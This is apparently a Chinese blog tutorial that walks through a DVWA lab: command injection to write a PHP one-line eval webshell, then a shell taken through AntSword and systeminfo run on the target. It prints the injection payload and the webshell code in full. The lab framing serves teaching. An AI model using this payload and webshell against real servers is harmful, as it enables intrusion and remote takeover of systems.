MSF模拟渗透测试之一句话木马拿shell
文章目录
前言
一、利用命令执行漏洞,生成一句话木马文件
(1)一句话木马
127.0.0.1 && echo ^<?php @eval($_POST[‘x’]);?^> >shell.php
(2)进行渗透测试,老样子,第一步进行信息收集,nmap端口扫描,访问web站点,这里利用win7进行渗透测试,打开kali,打开目标主机的ip的dvwa进行测试。
输入127.0.0.1 && ipconfig后出现ip信息

(3)找到ip地址后,编写一个木马文件
127.0.0.1 && echo ^<?php @eval($_POST[‘x’]);?^> >shell.php
在执行框中输入代码后回车

(4)再输入127.0.0.1 && dir后回车

出现已经存在了shell.php文件。
二、利用一句话木马拿shell
1.复制当前网址到蚁剑,添加数据,输入密码
输入木马文件中的密码后,点击添加
代码如下(示例):
2.进行添加,拿shell
(1)添加后,成功拿到对方主机的shell。

(2)拿到shell,下一步就是进入终端,查看对方的系统信息。
输入systeminfo后,成功返回系统信息,实验结束。
总结
本次实验是通过信息收集,端口扫描,查看对方的web站点,寻找ip地址,利用命令执行漏洞,在目标主机上生成一句话木马文件,复制网址到蚁剑进行连接,拿到shell的完整一次渗透测试过程,熟练的掌握了编写木马,蚁剑的使用过程,更清楚的了解了渗透测试的整个流程。

8146

被折叠的 条评论
为什么被折叠?



